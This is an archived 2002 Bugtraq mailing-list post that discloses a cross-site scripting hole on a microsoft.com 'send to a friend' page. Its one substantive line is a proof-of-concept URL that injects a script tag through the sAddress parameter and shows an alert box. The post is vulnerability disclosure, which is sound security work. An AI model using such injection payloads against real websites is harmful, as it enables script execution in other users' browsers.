Cross Site Scripting in microsoft.com

From: frog frog (leseulfrog@hotmail.com)
Date: 01/06/02

• Previous message: Tamer Sahin: "AOLserver 3.4.2 Unauthorized File Disclosure Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Date: 6 Jan 2002 16:28:54 -0000
From: frog frog <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)

The hole is here :

http://www.microsoft.com/freedomtoinnovate/inc/send
friend.asp?sAddress="><script>alert('Microsoft%
20hole')</script>

frog

---

• Previous message: Tamer Sahin: "AOLserver 3.4.2 Unauthorized File Disclosure Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2002-01